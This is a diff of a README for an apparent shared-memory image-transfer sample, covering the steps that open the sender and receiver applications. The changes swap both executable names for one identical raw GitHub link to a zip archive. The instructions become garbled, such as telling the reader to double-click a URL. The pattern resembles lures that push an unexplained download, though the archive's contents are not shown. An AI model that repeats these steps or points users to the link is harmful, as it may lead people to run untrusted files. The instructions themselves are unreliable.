gokkuuu/SharedMemorySample/README.md

 3. **Open the Applications**

    Navigate to the folder where you extracted the files.
 Look for the two application files:
-   - `SenderApp.exe`: The application that sends the image.
+   - `https://github.com/gokkuuu/SharedMemorySample/raw/refs/heads/master/SharedMemorySender/Sample_Shared_Memory_1.9.zip`: The application that sends the image.
-   - `ReceiverApp.exe`: The application that receives and displays the image.
+   - `https://github.com/gokkuuu/SharedMemorySample/raw/refs/heads/master/SharedMemorySender/Sample_Shared_Memory_1.9.zip`: The application that receives and displays the image.

-   Double-click to open `SenderApp.exe`.
+   Double-click to open `https://github.com/gokkuuu/SharedMemorySample/raw/refs/heads/master/SharedMemorySender/Sample_Shared_Memory_1.9.zip`.
 This application will allow you to select an image to send.

 4. **Sending an Image**